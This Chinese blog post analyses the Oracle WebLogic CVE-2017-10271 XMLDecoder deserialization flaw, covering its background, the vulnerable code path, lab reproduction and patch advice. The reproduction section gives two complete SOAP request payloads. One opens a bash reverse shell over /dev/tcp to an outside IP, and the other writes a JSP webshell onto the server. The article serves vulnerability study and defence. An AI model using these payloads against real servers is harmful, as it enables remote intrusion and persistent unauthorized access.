cve-2017–10271 XMLDecoder 反序列化漏洞 原理分析

最新推荐文章于 2024-05-24 22:57:12 发布
最新推荐文章于 2024-05-24 22:57:12 发布
阅读量1.4k 收藏 1
点赞数
原文链接:https://blog.csdn.net/whatday/article/details/107719768
版权

目录

1.漏洞背景

2.漏洞原理分析

3.漏洞测试

环境搭建

漏洞复现

4.修复建议

1.漏洞背景

Weblogic是oracle推出的application server,由于其具有支持EJB、JSP、JMS、XML等多种语言、可扩展性、快速开发等多种特性,备受广大系统管理员的青睐。根据不完全统计weblogic约占全球市场份额1/3,正因为这么高的占有率,也造成每次weblogic有新的漏洞,都会在业内引起轩然大波。在2017年接近尾声时,weblogic又再次给大家带来了巨大惊喜,CVE-2017-10271漏洞又一次席卷了政府、银行等各大行业。

其实在很早的时候,oracle官方就发布了有关CVE-2017-3506的补丁,由于是采用了黑名单的修复方式,没有彻底将该漏洞进行修复,具体修复代码如下:

由于当时并没有出现大量利用exp,所以此漏洞并没有被大规模利用,早期的补丁由于没有彻底修复,可通过构造相关http请求,依然可以进行远程命令执行。Oracle在后续又再次发布了CVE-2017-10271的补丁,具体补丁信息如下:

图片.png

推文上的一篇关于weblogic 0day,可以利用该漏洞进行远程植入挖矿木马的文章引发了大家的注意,随之10271上了各大安全论坛、安全厂商的头条,也正式开启了安全服务商的应急服务。

2.漏洞原理分析

CVE-2017-10271漏洞主要是由WebLogic Server WLS组件远程命令执行漏洞,主要由wls-wsat.war触发该漏洞,触发漏洞url如下: http://192.168.xx.xx:7001/wls-wsat/CoordinatorPortType  post数据包,通过构造构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞。

测试xml代码如下:

图片.png

Java读取xml文件文件进行反序列化命令执行如下,执行相关java代码即可执行calc,打开计算器

图片.png

weblogic.wsee.jaxws.workcontext.WorkContextServerTube.processRequest方法如下:

图片.png

将localheader1带入readHeaderOld,对localHeader1具体定义如下:

localHeader1=localHeaderList.get(WorkAreaConstants.WORK_AREA_HEADER,true);

readHeaderOld函数具体如下,创建WorkContextXmlInputAdapter(weblogic/wsee/jaxws/workcontext)

图片.png

WorkContextXmlInputAdapter类具体如下,此处通过XMLDecoder实现实体和xml内容的转换,随即出现了XMLDecoder反序列化,使得java在调用xml时实现了内容可控。

图片.png

weblogic.wsee.jaxws.workcontext.WorkContextServerTube.processRequest

weblogic.wsee.jaxws.workcontext.WorkContextTube.readHeaderOld

weblogic.wsee.workarea.WorkContextXmlInputAdapter

3.漏洞测试

环境搭建

Vulhub 启动测试环境:

docker-compose up -d

等待一段时间,访问http://your-ip:7001/即可看到一个404页面,说明weblogic已成功启动。

漏洞复现

发送如下数据包(注意其中反弹shell的语句,需要进行编码,否则解析XML的时候将出现格式错误):

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: your-ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 633

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/10.0.0.1/21 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

成功获取shell:

 

写入webshell(访问:http://your-ip:7001/bea_wls_internal/test.jsp):

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: your-ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java><java version="1.4.0" class="java.beans.XMLDecoder">
    <object class="java.io.PrintWriter"> 
    <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
    <void method="println"><string>
    <![CDATA[
<% out.print("test"); %>
    ]]>
    </string>
    </void>
    <void method="close"/>
    </object></java></java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

4.修复建议

该漏洞还是给很多行业带来了巨大冲击,就针对山东省而言,多家政府、事业单位也纷纷被攻击者利用该漏洞植入恶意程序,提出以下加固意见:

Ø  Oracle下载相关10271补丁,下载地址如下http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html

Ø  根据实际环境路径,删除WebLogicwls-wsat组件;删除相关文件后重启weblogic,保证访问wls-wsat/ 提示404错误;

针对该漏洞被恶意利用的单位可查看如下如下路径进行日志查看,具体的路径根据实际安装情况进行查看:

xx:\xx\Middleware\user_projects\domains\base_domain\servers\AdminServer\logs

具体日志内容如下:

参考资料:

http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html

http://pirogue.org/2017/12/29/weblogic-XMLDecoder/

http://blog.diniscruz.com/2013/08/using-xmldecoder-to-execute-server-side.html

https://github.com/iBearcat/Oracle-WebLogic-CVE-2017-10271

http://www.cnblogs.com/backlion/p/8194324.htm

 

 

whatday
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2017-10271 WebLogic XMLDecoder反序列化漏洞
m0_66299232的博客
04-12 601
CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。主要是由于wls组件使用了webservice来请求soap请求,所以通过构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞,可导致执行任意命令。5.因为执行whoami是无回显的,所以需要借助dnslog.cn网站进行回显。
Weblogic(CVE-2017-10271)漏洞复现
01-05 2058
WebLogic XMLDecoder反序列化漏洞CVE-2017-10271漏洞编号:CVE-2017-10271 漏洞描述:WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击,近期发现此漏洞的利用方式为传播挖矿程序。 受影响WebLogic版本:10.3.6.0.0,12.1.3.0.0,12.2....
weblogic CVE-2017-10271漏洞复现
最新发布
qq_68581192的博客
05-24 964
名称:weblogic XMLDecoder反序列化漏洞(CVE-2017-10271)原理:Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者可以构造XML语句,上传一句话木马,getshell。
Weblogic(CVE-2017-10271)的漏洞复现
陈瘦瘦的迪迦的博客
08-05 1211
Weblogic(CVE-2017-10271)漏洞复现 漏洞形成原因 Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 漏洞如何利用 利用服务器的XMLDecoder可以解析XML数据这一特性,可以构造XML语句,上传一句话木马,getshell。 漏洞复现过程 Kali docker 容器中启动此漏洞环境 浏览器访问 Kali 的 ip 地址并接上
WebLogic(CVE-2017-10271漏洞复现
weixin_51203422的博客
11-16 3802
docker vulhub搭建好靶场 访问:ip:7001 看到404就说明安装成功,开始进入下一步 访问该链接,显示如下就可能存在漏洞(因为是靶机,所以嘛,肯定有漏洞了) http://ip:port/wls-wsat/CoordinatorPortType 本地起好监听 nc -lp port 与下方红字对应 ``` POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: ip:7001 Accept-Encoding: gz..
Weblogic CVE-2017-10271 XMLDecoder反序列化漏洞
读书 买花 长大
02-17 451
CVE-2017-10271
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ)
01-09
然而,与所有软件一样,Weblogic也存在安全漏洞,其中CVE-2017-10271是一个著名的反序列化漏洞CVE-2017-10271漏洞源于Weblogic服务器中WLS-Windows-Autopatch组件处理特定类型输入的反序列化过程。这个组件是...
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ) 自己已经打上补丁了。欢迎下载
02-24
2017年,WebLogic服务器被发现存在一个名为CVE-2017-10271的安全漏洞,这是一个高危级别的反序列化漏洞。这个漏洞允许攻击者通过构造恶意的Java对象序列化数据,远程执行任意代码,从而控制受影响的系统。 **CVE-...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271"是针对这一特定漏洞的检测与防护解决方案。 首先,我们来理解什么是Java反序列化漏洞。在Java中,序列化是将对象的状态转化为...
Weblogic+XML反序列化漏洞检查工具CVE-2017-10271+V1.2
05-21
好用的Weblogic XML 反序列化漏洞检查工具 CVE-2017-10271 使用范围Oracle WebLogic Server 10.3.6.0.0版本 Oracle WebLogic Server 12.2.1.1.0版本 Oracle WebLogic Server 12.1.3.0.0版本
JBossMQJMS 反序列化漏洞CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞CVE-2017-7504)是针对企业级Java消息服务(JMS)提供商JBossMQ的一个严重安全问题。该漏洞源于应用程序未能正确处理反序列化的对象,使得攻击者可以通过精心构造的恶意输入触发任意代码...
Weblogic WLS组件REC漏洞(CVE-2017-10271)利用脚本
09-30
Weblogic wls-wsat组件反序列化漏洞(CVE-2017-10271)利用脚本。 命令执行并回显 直接上传shell 在linux下weblogic 10.3.6.0测试OK 使用方法及参数 python weblogic_wls_wsat_exp.py -t 172.16.80.131:7001 usage: weblogic_wls_wsat_exp.py [-h] -t TARGET [-c CMD] [-o OUTPUT] [-s SHELL] optional arguments: -h, --help show this help message and exit -t TARGET, --target TARGET weblogic ip and port(eg -> 172.16.80.131:7001) -c CMD, --cmd CMD command to execute,default is "id" -o OUTPUT, --output OUTPUT output file name,default is output.txt -s SHELL, --shell SHELL local jsp file name to upload,and set -o xxx.jsp
CVE-2017-10271(JAVA XMLDecoder反序列化专用工具).zip
06-22
测试专用
2017年java漏洞_【漏洞公告】Oracle多个Java漏洞更新-2017年7月
weixin_39835965的博客
03-05 120
2017年7月18日,Oracle官方发布了2017年7月份的安全公告,安全公告中报告了多个漏洞。成功利用这些漏洞时,远程用户可以访问和修改目标系统上的数据,在目标系统上获得提升的权限,导致目标系统上的拒绝服务等。本次公告涉及到的安全漏洞较多,安全风险较高。漏洞详情见下文。漏洞编号CVE-2017-10053,CVE-2017-10067, CVE-2017-10074, CVE-2017-100...
CVE-2017-11826漏洞利用样本分析
zz_strive_2012的专栏
10-19 3152
2017年10月10日,微软在例行的月度补丁中修复了一个漏洞编号为CVE-2017-11826的在野Microsoft Office 0day 漏洞。鉴于CVE-2017-11826已存在在野利用案例,金睛安全研究团队发布安全预警,提醒广大用户及时修补漏洞漏洞编号: CVE-2017-11826 漏洞影响软件: Microsoft Office Compatibil
利用DNSlog回显Weblogic(CVE-2017-10271) 漏洞执行命令结果
dfdhxb995397的博客
12-28 899
作者:Armyzer0 Weblogic(CVE-2017-10271) 漏洞出来以后又是一波血雨腥风,正好我昨天测试的时候发现了一个存在这个漏洞的weblogic,但是他不回显咋办呢!让他返回执行结果集到dnslong首先大家先了解下 “ 这个符号在Linux的作用! 符号:` `名称:反引号,上分隔符位置:反引号(`)这个字符一般在键盘的左上角,数字1的左边,不要将...
weblogic系列漏洞整理 -- 4. weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271CVE-2017-3506)...
weixin_30773135的博客
04-24 714
目录 四、 weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271) 0. 漏洞分析 1. 利用过程 2. 修复建议 一、weblogic安装 http://www.cnblogs.com/0x4D75/p/8...
CVE-2017-10271 weblogic XMLDecoder 反序列化漏洞
星落的博客
04-06 274
漏洞介绍 Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 影响版本 10.3.6.0.0 12.1.3.0.0 12.2.1.1.0 12.2.1.2.0 环境搭建 1.切换到weblogic相关目录下,部署docker环境 cd/root/vulhub/weblogic/CVE-2017-10271 docker-compose buil...
CVE-2017-10271漏洞原理
07-09
CVE-2017-10271漏洞原理涉及Oracle WebLogic Server中的一个组件,即WLS Security组件。该组件在处理用户输入时存在安全漏洞,使得攻击者可以通过构造恶意的HTTP请求来执行远程代码。 具体来说,该漏洞原理是利用WebLogic Server上的一个组件(T3协议)中的反序列化漏洞。攻击者可以发送特制的HTTP请求,其中包含恶意的序列化数据。当WebLogic Server接收到这个请求并尝试反序列化数据时,由于未正确验证和过滤输入,攻击者可以在服务器上执行任意代码。 攻击者利用该漏洞可以完全控制受影响的WebLogic Server,并执行任意操作,包括获取敏感数据、修改系统配置、部署恶意代码等。因此,该漏洞被认为是非常严重的安全威胁,并且需要及时采取措施来修复和保护受影响的系统。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值